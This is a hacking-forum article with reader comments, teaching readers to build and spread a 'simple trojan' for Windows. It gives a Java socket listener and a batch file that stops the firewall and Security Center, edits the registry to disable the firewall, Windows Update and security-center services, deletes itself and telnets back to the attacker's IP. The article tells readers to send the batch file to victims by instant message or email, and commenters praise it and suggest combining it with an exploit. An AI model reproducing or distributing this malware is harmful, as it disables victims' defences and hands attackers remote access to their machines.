Follow us on Twitter!
Things are more like they are now than they have ever been before. - Dwight D. Eisenhower
Friday, April 25, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 25
Guests Online: 23
Members Online: 2

Registered Members: 82909
Newest Member: awais
Latest Articles

Extremely Simple Trojan

Arrow Image How to make an extremely simple trojan virus using a short java program and batch file.



This is written for java, but it will work in VB, C++, whatever your prefered language is, I just happen to know the net commands for java best.

Here is the source from my java app:
import java.net.*;
public class trojServer
{
public static void main(String args[])
{
try{
ServerSocket server = new ServerSocket(5151);
System.out.println("Waiting...");
Socket sock = server.accept();
System.out.println(sock);
}catch(Exception x){x.printStackTrace();}
}
}

Now I'll explain a bit.

Bascially all I've done is set a port 5151 to wait for anything to connect to it, then it will resolve the IP address for you.

the batch file should look like

net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
telnet 127.0.0.1 5151

Now, the 127.0.0.1 will obviously be replaced with your IP address (try running IPCONFIG) and the port, here 5151, with whatever you specifiy. The rest of the code knocks out the firewall and hides from the AV...not really too discreate, but effective.

Start running your serverTroj app and then send the batches out over aim or emails or however you prefer to distrbute them and wait. telnet in once you have the IP address and
their secuity is down,

Enjoy...
Thanks to Zone Vortex for the firewall/AV killer.

Comments

chislamon September 09 2006 - 20:17:19
were you the one who wrote this on HTS?
only_samuraion September 10 2006 - 14:57:25
I was. Smile notice the same tag? lol have a nice day.
Kayoson October 24 2006 - 03:11:07
Thats Awesome!
only_samuraion October 30 2006 - 07:51:50
heh. Thanks Kayos. You can mix this with the IExploit i wrote to make a hyprid trodjan
ellipsison July 23 2011 - 10:56:30
This doesn't handle multiple socket connections. This did help me with my java course in '07-'08. Since I have good memories in that year, I will rate as "Awesome!"
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.